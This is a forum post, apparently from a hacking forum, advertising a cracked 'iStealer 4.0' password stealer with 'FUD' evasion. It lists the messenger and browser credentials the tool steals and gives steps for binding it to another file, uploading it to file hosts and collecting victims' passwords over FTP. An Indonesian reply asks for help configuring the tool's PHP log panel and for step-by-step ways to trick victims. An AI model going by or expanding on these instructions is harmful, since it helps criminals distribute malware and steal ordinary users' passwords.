QHEN wrote:iStealer 4.0 Precracked + Free FUD
[RS] i Stealer 4.0 Precracked
i Stealer 4.0 is a state of the art software that allows you to steal the following passwords...
-MSN Messenger (7.xx 8.xx)
-Google Talk
-Pidgin / Gaim
-Firefox (2.xx 3.xx)
-Internet Explorer (6.xx 7.xx)
i Stealer is very easy to use!
1. create an FTP account on a website such as t35
2. start i Stealer, and type in your details under FTP Options
3. Bind with another file, tick the box, and select the file.
4. Upload the file to a site like rapidshare, and distribute the file, check your FTP ever so often, and check your logs for passwords.
Code: Select all
sy sdh googling, namun kebanyakan tutorialnya inggris semuanya dan kurang "step-by step". sy sdh download istealer, cuma bingung waktu upload file istealer ke hostinagn 700megs.com. masalahnya adalah:
1-ketika mengedit index.php nya, terutama pengisian "My SQL host, MYSQL database name", karena ga bisa inggris. tolong diberikan contoh yg jelas (dg format berikut ini), mohon jgn di kaburkan nama/teksnya (boleh ngawur, asal format tulisannya sesuai dg hostingan 700megs.com), maaf kalo saya rewel,maklum karena belum faham sama sekali tentang MYSQL. ada jg tutorial di youtube, namun tetap sj pengeditan "index.phpnya" di tutupi (disamarkan) tulisannya. sy tau tujuannya knp ditutupi krn kerahasiaan pemiliknya, namun bagi newbie sprt sy, informasi sekecil apapun sangatlah dibutuhkan.berikut ini yg sy bingung dlm mengedit index.php nya:
// CONFIGURATION ************************************************** ****************************
$dbHost = "localhost"; // MySQL host
$dbUser = "example_user"; // MySQL username
$dbPass = "passw0rd"; // MySQL password
$dbDatabase = "example_db"; // MySQL database name
$username = "example"; // Login Username
$password = "passw0rd"; // Login Password
$logspage = 50; // Number of logs per page
2- cara menjebak victim spy bisa masuk kejebakan kita, mohon step by stepnya?
trimakasih byk sebelumnya.